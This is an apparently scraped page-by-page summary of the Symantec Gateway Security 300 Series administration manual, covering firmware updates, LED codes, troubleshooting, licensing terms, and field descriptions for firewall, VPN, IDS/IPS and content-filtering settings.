Apply the firmware by using the Symantec FTP utility (included on the Symantec Gateway Security 300 Series CD-ROM), or you can use the DOS TFTP command with the -i (binary) option. This transfers the firmware file to the appliance, applies it, and then restarts the appliance.
Page 131 Updating firmware Figure 9-5 shows the rear panel of models 360 and 360R. This graphic is for reference; the full description ofeach feature is available in the Symantec Gateway Security 300 Series Installation Guide. Figure 9-3 Model 360 and 360R rear panel...
Page 132 Do this only if flashing firmware as instructed in “Flashing the firmware” on page 130 does not work, or if you are instructed to do so by Symantec Technical Support. Figure 9-6 Figure 9-7 for reference in the following procedure.
Page 133: Checking Firmware Update Status
HTTP error message reported by the HTTP client. To check firmware update status Knowing the version of the firmware on the appliance is important if you plan to contact Symantec Technical Support. “LiveUpdate tab field descriptions” on page 159.
Page 134 Backing up and restoring configurations Note: You should not use a configuration backup file from an older version of the firmware to restore your settings unless instructed to do so by Symantec Technical Support. The backup file is created in the same folder on your hard drive where you put the symcftpw application.
Page 135: Resetting The Appliance
The firmware resets to the last all.bin firmware file that was used to flash the appliance. This is either the factory firmware or a firmware upgrade that you downloaded from the Symantec Web site and applied to the appliance. Note: LiveUpdate does not download and apply all.bin firmware upgrades.
Page 136: Interpreting Leds
Model 320 rear panel Figure 9-5 shows the rear panel of models 360 and 360R. This graphic is for reference; the full description ofeach feature is available in the Symantec Gateway Security 300 Series Installation Guide. Figure 9-5 Model 360 and 360R rear panel To perform a basic reset On the rear panel of the appliance, quickly press the reset button (1).
Page 137 Security WLAN Access Point option is inserted. Figure 9-4 shows the rear panel on model 320. This graphic is for reference; the full description of each feature is available in the Symantec Gateway Security 300 Series Installation Guide. Figure 9-6...
Page 138 138 Logging, monitoring and updates Interpreting LEDs Table 9-2 LEDs Location Symbol Feature Description Error Illuminates if there is a problem with the appliance. Transmit Illuminates or flashes when traffic is being passed over the LAN or WAN ports. Backup Illuminates or flashes when the serial port is being used or is not functioning correctly.
Page 139: Liveupdate And Firmware Upgrade Led Sequences
Logging, monitoring and updates Interpreting LEDs Table 9-3 LEDs states and appliance status Error LED (2) state Transmit LED (3) state Appliance status Solid on Solid on Hardware problem. Flashing once Solid off RAM error. Flashing twice Solid off Timer error. Flash three Solid off DMA error.
Page 140 140 Logging, monitoring and updates Interpreting LEDs...
Page 141: Appendix A Troubleshooting
The Debug information feature provides a high level of detail of the system events information in the log. Debug mode gives more detailed information in the status log that is useful for Symantec Technical Support or for troubleshooting. The default user mode provides general information about actions taken defined by the security policy.
Page 142 142 Troubleshooting About troubleshooting To troubleshoot Symantec Gateway Security 300 Series appliances “Logging/Monitoring field descriptions” on page 151. ■ “Troubleshooting tab field descriptions” on page 156. ■ To set logging levels In the SGMI, in the left pane, click Logging/Monitoring.
Page 143: Accessing Troubleshooting Information
Under Product Support > enterprise, click Continue. On the Support enterprise page, under Technical Support, click knowledge base. Under select a knowledge base, scroll down and click Symantec Gateway Security 300 Series. Click your specific product name and model. On the knowledge base page for your appliance model, do any of the...
Page 144 144 Troubleshooting Accessing troubleshooting information On the Browse tab, expand a heading to see knowledge base articles ■ related to that topic.
Page 145: Appendix B Licensing
300 Series Client-to-Gateway VPN functions Symantec Client VPN software may licensed for an appliance. The Symantec Client VPN software version must be listed as supported in the Symantec Gateway Security 300 Series Release Notes. The Client-to-Gateway VPN add-on is licensed by the maximum number of concurrent VPN sessions allowed. The appliance comes with a license for one Client-to-Gateway VPN session.
Page 146: Symantec Gateway Security Appliance License And Warranty Agreement
Software that the Licensor may furnish to You . Except as may be modified by a Symantec license certificate, license coupon, or license key (each a "License Module") which accompanies, precedes, or follows this license, and as may be...
Page 147: Limited Warranty
(30) days from the date of original purchase of the Appliance. Your sole remedy in the event of a breach of this warranty will be that Symantec will, at its option, repair or replace any defective Software returned to Symantec within the warranty period or refund the money You paid for the Appliance.
Page 148 Appliance, Symantec will return such repaired or replacement Appliance to You, freight and insurance prepaid. In the event that Symantec, in its sole discretion, determines that it is unable to replace or repair the Hardware, Symantec will refund to You the F.O.B.
Page 149 Symantec products to any military entity not approved under the EAR, or to any other entity for any military purpose, nor will it sell any Symantec product for use in connection with chemical, biological, or nuclear weapons or missiles capable of delivering such weapons.
Page 150 150 Licensing SYMANTEC GATEWAY SECURITY APPLIANCE LICENSE AND WARRANTY AGREEMENT...
Page 151: Appendix C Field Descriptions
Content filtering field descriptions ■ Logging/Monitoring field descriptions The Symantec Gateway Security 300 Series provides configurable system logging features and tabs for viewing the system logs and monitoring system status. It also has built-in testing tools for troubleshooting and connectivity verification.
Page 152: Status Tab Field Descriptions
152 Field descriptions Logging/Monitoring field descriptions Status tab field descriptions The Status tab shows the current conditions and settings of the security gateway. Table C-1 Status tab field descriptions Section Field Description Model 320: Connection Status Displays whether the WAN port is connected or disconnected to the Internet or an internal WAN (External network.
Page 153 Field descriptions Logging/Monitoring field descriptions Table C-1 Status tab field descriptions (Continued) Section Field Description LAN (External IP Address Displays the IP address of the security gateway. Port) The default value is 192.168.0.1. Physical Address Displays the physical address (MAC) of the security gateway’s LAN’s port.
Page 154: View Log Tab Field Descriptions
154 Field descriptions Logging/Monitoring field descriptions View Log tab field descriptions The View Log tab shows a list of system events. Table C-2 View Log field descriptions Section Field Description View Log UTC Time Coordinated Universal Time (UTC), which is the Greenwich Mean time that the message was logged.
Page 155: Log Settings Tab Field Descriptions
Field descriptions Logging/Monitoring field descriptions Log Settings tab field descriptions The Log Settings tab lets you configure settings that control email notification, the types of messages that are logged, and the time listed for each log message. Table C-3 Log Settings field descriptions Section Field Description...
Page 156: Troubleshooting Tab Field Descriptions
156 Field descriptions Logging/Monitoring field descriptions Table C-3 Log Settings field descriptions (Continued) Section Field Description Log Type System activity, Logs all system activity and connection status. connection status This type is checked by default. Connections Logs all connections allowed by outbound rule ALLOWED by policies.
Page 157: Administration Field Descriptions
Field descriptions Administration field descriptions Table C-4 Troubleshooting tab field descriptions (Continued) Section Field Description Testing Tools Target Host IP address or fully qualified domain name of host you are testing with one of the tools. The address is not validated, so ensure that you type the address accurately.
Page 158: Basic Management Tab Field Descriptions
158 Field descriptions Administration field descriptions Basic Management tab field descriptions The Basic Management tab helps you control access to the SGMI with the administration password and allowed IP addresses. Table C-5 Basic Management tab field descriptions Section Field Description Administration admin’s Password Password used to access the SGMI.
Page 159: Liveupdate Tab Field Descriptions
LiveUpdate Server IP address or fully qualified domain name of the LiveUpdate server from which to get firmware updates. The default address is http://liveupdate.symantec.com. Automatic Updates Enable Scheduler Enables the LiveUpdate scheduler. This lets you schedule times for the security gateway to automatically check for firmware updates, and then apply them.
Page 160: Lan Field Descriptions
160 Field descriptions LAN field descriptions Table C-7 LiveUpdate tab field descriptions (Continued) Section Field Description Optional Settings HTTP Proxy Server Enables the security gateway to contact the LiveUpdate server through a HTTP proxy server. Proxy Server IP address of the HTTP proxy server Address through which the LiveUpdate server gets the firmware updates.
Page 161: Lan Ip & Dhcp Tab Field Descriptions
Field descriptions LAN field descriptions LAN IP & DHCP tab field descriptions The LAN IP & DHCP tab lets you set the security gateway’s IP address and configure the security gateway to act as a DHCP server. Table C-8 LAN IP & DHCP tab field descriptions Section Field Description...
Page 162: Port Assignment Tab Field Descriptions
WAN/ISP field descriptions The Symantec Gateway Security 300 Series WAN/ISP functionality provides connections to the outside world. This can be the Internet, a corporate network, or any other external private or public network. WAN/ISP functionality can also be configured to connect to an internal LAN when the security gateway is protecting an internal subnet.
Page 163 Field descriptions WAN/ISP field descriptions Main Setup tab field descriptions ■ Static IP & DNS tab field descriptions ■ PPPoE tab field descriptions ■ Dial-up Backup & Analog/ISDN tab field descriptions ■ PPTP tab field descriptions ■ Dynamic DNS tab field descriptions ■...
Page 164: Main Setup Tab Field Descriptions
164 Field descriptions WAN/ISP field descriptions Main Setup tab field descriptions On the Main Setup tab, you select your connection type and configure the security gateway’s identification settings. Table C-10 Main Setup tab field descriptions Section Fields Description Model 320: Connection Type The following connection types are supported: Connection Type...
Page 165: Static Ip & Dns Tab Field Descriptions
Field descriptions WAN/ISP field descriptions Table C-10 Main Setup tab field descriptions (Continued) Section Fields Description Optional Network Host Name Name of the security gateway on the network. A Settings default value based on the model number and the MAC address is provided in the Setup Wizard.
Page 166: Pppoe Tab Field Descriptions
166 Field descriptions WAN/ISP field descriptions PPPoE tab field descriptions Use the PPPoE tab to configure the security gateway to connect to the Internet with an account that uses PPPoE for authentication. Table C-12 PPPoE tab field descriptions Section Field Description Model 320: WAN Port (Model...
Page 167: Dial-Up Backup & Analog/Isdn Tab Field Descriptions
Field descriptions WAN/ISP field descriptions Table C-12 PPPoE tab field descriptions (Continued) Section Field Description Choose Service Query Services When you click Query Services, the security gateway connects to your ISP and determines which services are available. You must disconnect from your PPPoE account before using this feature.
Page 168 168 Field descriptions WAN/ISP field descriptions Table C-13 Dial-up or ISDN tab field descriptions (Continued) Section Field Description ISP Account User Name User name for the dial-up account. Information Password Password for the dial-up account. Verify Password Retype the password for the dial-up account. IP Address If you have a static IP address with your ISP, type it here.
Page 169 Field descriptions WAN/ISP field descriptions Table C-13 Dial-up or ISDN tab field descriptions (Continued) Section Field Description Modem Settings Model Model type of your modem. If your specific model type is not listed, click Other. Initialization Modem command that the security gateway String sends to the modem to begin dialing the ISP.
Page 170 170 Field descriptions WAN/ISP field descriptions Table C-13 Dial-up or ISDN tab field descriptions (Continued) Section Field Description Analog Status Port Status Describes the status of the serial port on the security gateway where the modem is connected. Possible port status includes: Idle ■...
Page 171: Pptp Tab Field Descriptions
Field descriptions WAN/ISP field descriptions PPTP tab field descriptions Configure the security gateway to connect to the Internet with an account that uses PPTP for authentication. Table C-14 PPTP tab field descriptions Section Field Description WAN Port: Model WAN Port(Model WAN port for which you are configuring PPTP.
Page 172 WAN port to configure dynamic DNS. 360/360R) Force DNS Update Sends updated IP information to the dynamic DNS service. Do this only if requested by Symantec Technical Support. TZO Dynamic Alphanumeric string of characters that acts as a DNS Service password for the TZO account.
Page 173 Field descriptions WAN/ISP field descriptions Table C-15 Dynamic DNS tab field descriptions (Continued) Section Field Description Standard Service User Name User name for the account that you create with a dynamic DNS service. Password Password for the account that you create with a dynamic DNS service.
Page 174: Routing Tab Field Descriptions
174 Field descriptions WAN/ISP field descriptions Routing tab field descriptions Use the routing table to configure static or dynamic routing for your security gateway. Table C-16 Routing tab field descriptions Section Field Description Dynamic Routing Enable RIP v2 Enables dynamic routing. Use this only for intranet or department gateways.
Page 175: Advanced Tab Field Descriptions
Field descriptions WAN/ISP field descriptions Advanced tab field descriptions Use the Advanced tab to configure optional connection settings and the DNS gateway. Table C-17 Advanced tab field descriptions Section Field Description Load Balancing WAN 1 Load Percentage of traffic to pass through WAN 1. The (Model 360/360R) remainder of traffic passes through WAN 2.
Page 176: Firewall Field Descriptions
ISP’s DNS servers as a backup. Firewall field descriptions The Symantec Gateway Security 300 Series security gateway includes firewall technology that let you define the inbound and outbound rules governing the traffic that passes through the security gateway. When configuring the firewall you need to identify all nodes (computers) that are protected on your network.
Page 177: Computers Tab Field Descriptions
Field descriptions Firewall field descriptions Services tab field descriptions ■ Special Application tab field descriptions ■ Advanced tab field descriptions ■ Computers tab field descriptions Before configuring outbound or inbound rules, you must identify the nodes on the Computers tab. Table C-18 Computers tab field descriptions Section...
Page 178 178 Field descriptions Firewall field descriptions Table C-18 Computers tab field descriptions (Continued) Section Field Description Application Reserve Host Adds the MAC address (that you specified in the Server Adapter (MAC) Address text box) to the appliance’s DHCP server so it is always assigned to the IP address that you specify in the IP Address text box.
Page 179: Computer Groups Tab Field Descriptions
■ A client with non-compliant virus software or virus definitions is denied access to the external network. The client is allowed access to the Symantec Antivirus CE Server or LiveUpdate server to bring their virus definitions into compliance. Content Filtering...
Page 180: Inbound Rules Field Descriptions
180 Field descriptions Firewall field descriptions Table C-19 Computer Groups tab field descriptions (Continued) Section Field Description Access Control No restrictions A host assigned to this group may pass any (Outbound Rules) traffic to the external network. You do not need to define rules for access groups in this category.
Page 181: Outbound Rules Tab Field Descriptions
Field descriptions Firewall field descriptions Table C-20 Inbound Rules fields description (Continued) Section Field Description Rule Definition Name Type a new name when adding a rule. Enable Rule Check to enable the inbound rule. Application Shows the configured application servers Server available for inbound rules.
Page 182: Services Tab Field Descriptions
182 Field descriptions Firewall field descriptions Services tab field descriptions Define the services to be used in the outbound and inbound firewall rules on the Services tab. Table C-22 Services tab field descriptions Section Field Description Services Application Select an application available for services to edit or delete.
Page 183: Special Application Tab Field Descriptions
Field descriptions Firewall field descriptions Table C-22 Services tab field descriptions (Continued) Section Field Description Service List Name Name of the service. Protocol Protocol associated with the service. Listen on Start First port in the range to listen on. Port Listen on End Port Last port in the range to listen on.
Page 184 184 Field descriptions Firewall field descriptions Table C-23 Special Applications tab field descriptions (Continued) Section Field Description Special Name Name of the special application. Application Enable Enables the special application for all computer Settings groups. Outgoing Protocol Protocol for the outgoing packets. Options include: ■...
Page 185 Field descriptions Firewall field descriptions Table C-23 Special Applications tab field descriptions (Continued) Section Field Description Special Name Name of the special application. Application List Enabled Indicates whether the special application is enabled for all computer groups. Outgoing Protocol Protocol for the outgoing packets. Outgoing Start First port in the range of outgoing ports.
Page 186: Advanced Tab Field Descriptions
186 Field descriptions Firewall field descriptions Advanced tab field descriptions You configure advanced firewall settings, such as IPsec pass-thru, on the Advanced tab. Table C-24 Advanced tab field descriptions Section Field Description Optional Security Enable IDENT Disabling the IDENT port makes port 113 closed, Settings Port not stealth (not open).
Page 187: Vpn Field Descriptions
VPN gateway on the security gateway. Keep this setting at 2 SPI unless instructed by Symantec Technical Support to change it. The None setting lets VPN clients be used in exposed host mode if it is having problems connecting from behind the security gateway.
Page 188 VPNs are used to allow a single user or a remote network access to the protected resources of another network. The Symantec Gateway Security 300 Series security gateways support two types of VPN tunnels: Gateway-to-Gateway and Client-to-Gateway.
Page 189: Dynamic Tunnels Tab Field Descriptions
Client VPN software typically negotiates in aggressive mode. The default value is Main Mode. VPN Policy Policy that dictates authentication, encryption, and timeout settings. The list contains Symantec pre-defined policies and any policies you created on the VPN Policies tab.
Page 190 190 Field descriptions VPN field descriptions Table C-25 Dynamic Tunnels field descriptions Section Field Description Local Security PPPoE Session The default PPPoE session is Session 1. Gateway This requires an ISP PPPoE account. If you have a single-session PPPoE account, leave the PPPoE session at Session 1.
Page 191 Field descriptions VPN field descriptions Table C-25 Dynamic Tunnels field descriptions Section Field Description Global Tunnel Normally, only requests destined to the network protected by the remote VPN Gateway are forwarded through the VPN. Other traffic, like Web browsing are forwarded straight out into the Internet.
Page 192 192 Field descriptions VPN field descriptions Table C-25 Dynamic Tunnels field descriptions Section Field Description Remote Security Gateway Address IP address or fully qualified domain name of the Gateway remote gateway (the gateway to which the tunnel will connect). The maximum number of alphanumeric characters for this text box is 128.
Page 193: Static Tunnels Tab Field Descriptions
Field descriptions VPN field descriptions Static Tunnels tab field descriptions This table describes the fields on the Static Tunnels tab that you use to...
Page 194 194 Field descriptions VPN field descriptions configure static gateway-to-gateway VPN tunnels for the security gateway.
Page 195 This value must match the incoming SPI on the remote end of the tunnel. VPN Policy Policy that dictates authentication, encryption, and timeout settings. The list contains Symantec pre-defined policies and any policies you created on the VPN Policies tab.
Page 196 196 Field descriptions VPN field descriptions Table C-26 Static Tunnel tab field descriptions (Continued) Section Field Description Remote Security Gateway Address IP address or fully qualified domain name of the Gateway security gateway to which you are creating a tunnel. The maximum length for this field is 128 alphanumeric characters.
Page 197: Client Tunnels Tab Field Descriptions
Field descriptions VPN field descriptions Client Tunnels tab field descriptions Use the Client Tunnels tab to define client-to-gateway tunnels. Ensure that you have defined your users on the Client Users tab before defining the tunnel. Table C-27 Client tunnel tab definition field descriptions Section Field Description...
Page 198 198 Field descriptions VPN field descriptions Table C-27 Client tunnel tab definition field descriptions (Continued) Section Field Description Extended User Enable Extended Requires that all users in the selected VPN group Authentication User use RADIUS for extended authentication after Authentication phase 1, but before phase 2.
Page 199: Client Users Tab Field Descriptions
User Name User name for the client user. The maximum number of alphanumeric characters for this value is 31. It must match the remote Client ID in Symantec Client VPN software. You can add up to 50 client users. Pre-Shared Key ISAKMP (IKE) authenticating key.
Page 200: Vpn Policies Tab Field Descriptions
Table C-29 VPN policies field descriptions Section Field Description IPsec Security VPN Policy Select a policy to update or delete. Association Note: You cannot delete Symantec pre-defined (Phase 2) policies. Parameters Options include: ike_default_crypto ■ ike_default_crypto_strong ■ Static_default_crypto ■...
Page 201 Field descriptions VPN field descriptions Table C-29 VPN policies field descriptions (Continued) Section Field Description SA Lifetime Time, in minutes, before phase 2 renegotiation of new encryption and authentication keys for the tunnel. The default value is 480 minutes. The maximum value is 2,147,483,647 minutes.
Page 202: Status Tab Field Descriptions
202 Field descriptions VPN field descriptions Status tab field descriptions The Status tab shows the status of your VPN tunnels and client users. Table C-30 Status tab field descriptions Section Field Description Dynamic VPN Status Status of the selected tunnel. Tunnels Name Name of the selected tunnel.
Page 203: Advanced Tab Field Descriptions
The maximum value is 31 alphanumeric characters. VPN Policy VPN policy for VPN client tunnels for phase 2 tunnel negotiation. The list shows pre-defined Symantec policies and any policies you created on the VPN Policies tab. Dynamic VPN Enable Dynamic...
Page 204: Ids/Ips Field Descriptions
The maximum value is 50 alphanumeric characters. IDS/IPS field descriptions The Symantec Gateway Security 300 series security gateway provides intrusion detection and prevention (IDS/IPS). The IDS/IPS functions are enabled by default, and provide atomic packet protection with spoof protection and IP. You may disable IDS/IPS functionality at any time.
Page 205: Ids Protection Tab Field Descriptions
Field descriptions IDS/IPS field descriptions Port scan detection ■ This section contains the following topics: IDS Protection tab field descriptions ■ Advanced tab field descriptions ■ IDS Protection tab field descriptions Configure basic IDS protection on the IDS Protection tab. Table C-32 IDS Protection tab field descriptions Section...
Page 206: Advanced Tab Field Descriptions
206 Field descriptions IDS/IPS field descriptions Advanced tab field descriptions Configure spoof protection on the Advanced tab. Table C-33 Advanced tab field descriptions Section Field Description IP Spoof Protection Enables spoof protection on the LAN. WLAN/LAN Enables spoof protection on the wireless LAN and LAN.
Page 207: Avpe Field Descriptions
Field descriptions AVpe field descriptions AVpe field descriptions The AVpe feature lets you monitor client AVpe configurations and, if necessary, enforce security policies to restrict network access to only those clients who are protected by antivirus software with the most current virus definitions. Table C-34 AVpe tab field descriptions Section...
Page 208 Description Policy Validation Verify AV Client is When enabled, this field lets you verify that Active Symantec antivirus software is installed and active on a client’s workstation. Options include: Latest Product Engine (default) ■ Verifies that Symantec antivirus software is active and that it contains the latest product scan engine.
Page 209 Displays the current product version of the Symantec AntiVirus Corporate Edition that the antivirus server is running; for example: 7.61.928. Engine Displays the current version of the Symantec AntiVirus Corporate Edition scan engine that is running on the antivirus server; for example: NAV 4.1.0.15. Pattern Displays the latest version of the virus definition file on the antivirus server;...
Page 210: Content Filtering Field Descriptions
Product Name of the Symantec antivirus product that the client is using. Engine Version of the scan engine in the Symantec antivirus product the client is using. Pattern Version of the client’s most recent virus definitions.
Page 211 Description Modify List Input URL Type a URL to add to the deny or allow list. For example, www.symantec.com or myadultsite.com/mypics/me.html The maximum length of a URL is 128 characters. Each filtering list can hold up to 100 entries. You add URLs one at a time.
Page 212 212 Field descriptions Content filtering field descriptions...
Page 213: Index
WAN/ISP settings 50 Client-to-Gateway tunnels, global policy AES-128 93 settings 101 AES-192 93 clusters AES-256 93 creating tunnels to Symantec Gateway 5400 alive indicator 28, 40, 53 Series clusters 91 all.bin 129 compression, tunnel 82 allow list 111 computer group membership 65...
Page 214 214 Index Maximum Transmission Unit (MTU) 45 verifying connectivity 42 new computers 65 dial-up connection 29 port assignments 60 disabling PPTP 36 dynamic DNS 48 remote management 17 NAT mode 77 routing 48 disconnect special applications 74 idle PPPoE connections 31 static IP 35 DNS gateway 53 static route entries 49...
Page 215 Index tunnel persistence and high-availability 90 gateway-to-gateway Main menu 14 supported VPN tunnels 90 managing Girlfriend 116 administrative access 15 Global IKE Policy 83 content filtering lists 112 global policy settings, Client-to-Gateway ICMP requests 79 tunnels 101 using the serial console 19 manual dial-up accounts 42 manually connect to PPTP account 38...
Page 216 IP spoofing 117 static route entries 49 TCP flag validation 118 subnet 90 protection preferences SubSeven 116 configuring Symantec Gateway Security 5400 Series 90, 91 protection preferences settings 116 Syndrop 116 settings 116 T1 connectivity 30 Query Services 167 T3 29...
Page 217 PPPoE connectivity 33 video conferencing 74 authentication key lengths 93 configuring Client-to-Gateway tunnels 96 creating custom phase 2 policies 84 creating tunnels to Symantec Gateway Security 5400 Series clusters 91 encryption key lengths 93 global policy settings 101 monitoring tunnel status 102...
Page 218 218 Index...

This manual is also suitable for:

320 360

Symantec 360R - Security Gateway SGS Administration Manual

Chapter 1 Introducing the Symantec Gateway Security 300 Series

Chapter 2 Administering the Security Gateway

Chapter 3 Configuring a Connection to the Outside Network

Chapter 4 Configuring Internal Connections

Chapter 5 Network Traffic Control

Chapter 6 Establishing Secure VPN Connections

Chapter 7 Advanced Network Traffic Control

Chapter 8 Preventing Attacks

Chapter 9 Logging, Monitoring and Updates

Appendix A Troubleshooting

Appendix B Licensing

Appendix C Field Descriptions

Quick Links

Troubleshooting

Related Manuals for Symantec 360R - Security Gateway SGS

Summary of Contents for Symantec 360R - Security Gateway SGS

This manual is also suitable for:

Table of Contents